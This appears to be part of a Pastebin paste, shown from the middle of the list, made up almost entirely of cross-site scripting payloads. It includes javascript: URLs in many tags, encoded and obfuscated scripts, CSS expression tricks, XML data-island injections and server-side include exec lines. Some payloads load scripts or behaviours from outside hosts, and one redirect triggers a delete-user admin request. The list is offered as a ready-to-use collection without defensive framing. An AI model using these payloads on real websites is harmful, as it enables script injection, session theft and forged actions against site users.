  779.  
  780. <IMG SRC=”mocha:[code]”>
  781.  
  782. <IMG SRC=”livescript:[code]”>
  783.  
  784.  
  785.  
  786.  
  787.  
  788. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘CrossSiteScripting’);”>
  789.  
  790. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  791.  
  792. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘CrossSiteScripting’);”>
  793.  
  794. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘CrossSiteScripting’);”>
  795.  
  796. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  797.  
  798. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=jAvAsCriPt:aLeRt(‘CroSsSiteScrIpting’);”>
  799.  
  800. <META HTTP-EQUIV=”Link” Content=”<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet”>
  801.  
  802. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘CrossSiteScripting’)</SCRIPT>”>
  803.  
  804. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-alert(‘CrossSiteScripting’);+ADw-/SCRIPT+AD4-
  805.  
  806.  
  807.  
  808.  
  809.  
  810. <OBJECT TYPE=”text/x-scriptlet” DATA=”http://vulnerability-lab.com/scriptlet.html”></OBJECT>
  811.  
  812. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘CrossSiteScripting’)></OBJECT>
  813.  
  814.  
  815.  
  816.  
  817.  
  818. <STYLE>@im\port’\ja\vasc\ript:alert(“CrossSiteScripting”)’;</STYLE>
  819.  
  820. <STYLE>@import’http://vulnerability-lab.com/CrossSiteScripting.css’;</STYLE>
  821.  
  822. <STYLE TYPE=”text/javascript”>alert(‘CrossSiteScripting’);</STYLE>
  823.  
  824. <STYLE>.CrossSiteScripting{background-image:url(“javascript:alert(‘CrossSiteScripting’)”);}</STYLE><A CLASS=CrossSiteScripting></A>
  825.  
  826. <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘CrossSiteScripting’)”)}</STYLE>
  827.  
  828. <STYLE>li {list-style-image: url(“javascript:alert(‘CrossSiteScripting’)”);}</STYLE><UL><LI>CrossSiteScripting
  829.  
  830. <STYLE>BODY{-moz-binding:url(“http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting”)}</STYLE>
  831.  
  832.  
  833.  
  834.  
  835.  
  836. <DIV STYLE=”background-image: url(javascript:alert(‘CrossSiteScripting’))”>
  837.  
  838. <DIV STYLE=”background-image:\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029″>
  839.  
  840. <DIV STYLE=”background-image: url(javascript:alert(‘CrossSiteScripting’))”>
  841.  
  842. <DIV STYLE=”width: expression(alert(‘CrossSiteScripting’));”>
  843.  
  844.  
  845.  
  846. <LAYER SRC=”http://vulnerability-lab.com/script.html”></LAYER>
  847.  
  848. <LINK REL=”stylesheet” HREF=”javascript:alert(‘CrossSiteScripting’);”>
  849.  
  850. <LINK REL=”stylesheet” HREF=”http://vulnerability-lab.com/CrossSiteScripting.css”>
  851.  
  852.  
  853.  
  854. <BODY BACKGROUND=”javascript:alert(‘CrossSiteScripting’)”>
  855.  
  856. <BODY ONLOAD=alert(‘CrossSiteScripting’)>
  857.  
  858. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“CrossSiteScripting”)>
  859.  
  860. <iframe src=http://vulnerability-lab.com/index.html <
  861.  
  862.  
  863.  
  864.  
  865.  
  866. <TABLE BACKGROUND=”javascript:alert(‘CrossSiteScripting’)”>
  867.  
  868. <TABLE><TD BACKGROUND=”javascript:alert(‘CrossSiteScripting’)”>
  869.  
  870.  
  871.  
  872. <BGSOUND SRC=”javascript:alert(‘CrossSiteScripting’);”>
  873.  
  874. <BR SIZE=”&{alert(‘CrossSiteScripting’)}”>
  875.  
  876.  
  877.  
  878.  
  879.  
  880. <A HREF=”http://server.com/”>CrossSiteScripting</A>
  881.  
  882. <A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”>CrossSiteScripting</A>
  883.  
  884. <A HREF=”http://1113982867/”>CrossSiteScripting</A>
  885.  
  886. <A HREF=”javascript:document.location=’http://www.vulnerability-lab.com/'”>CrossSiteScripting</A>
  887.  
  888.  
  889.  
  890. <BASE HREF=”javascript:alert(‘CrossSiteScripting’);//”>
  891.  
  892.  
  893.  
  894. \”;alert(‘CrossSiteScripting’);//
  895.  
  896.  
  897.  
  898. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘CrossSiteScripting’);”>
  899.  
  900.  
  901.  
  902.  
  903.  
  904.  
  905.  
  906.  
  907.  
  908. <CrossSiteScripting STYLE=”behavior: url(CrossSiteScripting.htc);”>
  909.  
  910.  
  911.  
  912.  
  913.  
  914. ¼script¾alert(¢CrossSiteScripting¢)¼/script¾
  915.  
  916.  
  917.  
  918.  
  919.  
  920.  
  921.  
  922. <IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert(‘CrossSiteScripting’))”>
  923.  
  924. <CrossSiteScripting STYLE=”CrossSiteScripting:expression(alert(‘CrossSiteScripting’))”> exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”); CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert(“CrossSiteScripting”))’>
  925.  
  926.  
  927.  
  928.  
  929.  
  930.  
  931.  
  932.  
  933.  
  934.  
  935.  
  936. a=”get”;
  937.  
  938. b=”URL(\””;
  939.  
  940. c=”javascript:”;
  941.  
  942. d=”alert(‘CrossSiteScripting’);\”)”;
  943.  
  944. eval(v+l+a+b);
  945.  
  946.  
  947.  
  948. <HTML xmlns:CrossSiteScripting>
  949.  
  950. <?import namespace=”CrossSiteScripting” implementation=”http://ha.ckers.org/CrossSiteScripting.htc”>
  951.  
  952. <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>
  953.  
  954.  
  955.  
  956. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘CrossSiteScripting’);”>]]>
  957.  
  958. </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  959.  
  960.  
  961.  
  962.  
  963.  
  964. <XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:alert(‘CrossSiteScripting’)”></B></I></XML>
  965.  
  966. <SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  967.  
  968.  
  969.  
  970.  
  971.  
  972. <XML SRC=”CrossSiteScriptingtest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  973.  
  974.  
  975.  
  976. <HTML><BODY>
  977.  
  978. <?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
  979.  
  980. <?import namespace=”t” implementation=”#default#time2″>
  981.  
  982. <t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>alert(“CrossSiteScripting”)</SCRIPT>”>
  983.  
  984. </BODY></HTML>
  985.  
  986.  
  987.  
  988. <SCRIPT SRC=”http://vulnerability-lab.com/CrossSiteScripting.jpg”></SCRIPT>
  989.  
  990.  
  991.  
  992. <!–#exec cmd=”/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'”–>
  993.  
  994.  
  995.  
  996. <? echo(‘<SCR)’;
  997.  
  998. echo(‘IPT>alert(“CrossSiteScripting”)</SCRIPT>’); ?>
  999.  
  1000.  
  1001.  
  1002. <IMG SRC=”http://www.vulnerability-lab.com/file.php?variables=malicious”>
  1003.  
  1004.  
  1005.  
  1006. Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser
  1007.  
  1008.  
  1009.  
  1010.  
  1011.  
  1012.  
  1013.  
  1014.  
  1015.  
  1016. %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
  1017.  
  1018.  
  1019.  
  1020. &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;
  1021.  
  1022.  
  1023.  
  1024. &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!